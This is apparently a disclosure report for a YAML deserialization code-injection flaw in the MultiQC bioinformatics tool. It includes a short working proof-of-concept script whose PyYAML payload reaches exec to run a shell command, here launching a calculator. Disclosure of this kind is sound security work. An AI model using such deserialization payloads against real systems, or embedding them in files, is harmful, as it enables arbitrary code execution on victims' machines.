Code Injection in ewels/multiqc

Valid

Reported on

Jan 30th 2021

Description

MultiQC Aggregate results from bioinformatics analyses across many samples into a single report.

Vulnerability

Vulnerable to YAML deserialization attack caused by unsafe loading.

Proof of Concept

Installation

pip3 install multiqc

Run exploit.py

import os
#os.system('pip3 install multiqc')
from multiqc.modules.pycoqc import pycoqc
payload = """cmd: !!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""
pycoqc.MultiqcModule.load_data('Anon-Artist',payload)

python3 exploit.py

Impact

Arbitary Code Execution

References

https://drive.google.com/file/d/1S2zppml_IKJa2El7XZJN_V8DNDZQyCCs/view?usp=sharing

to join this conversation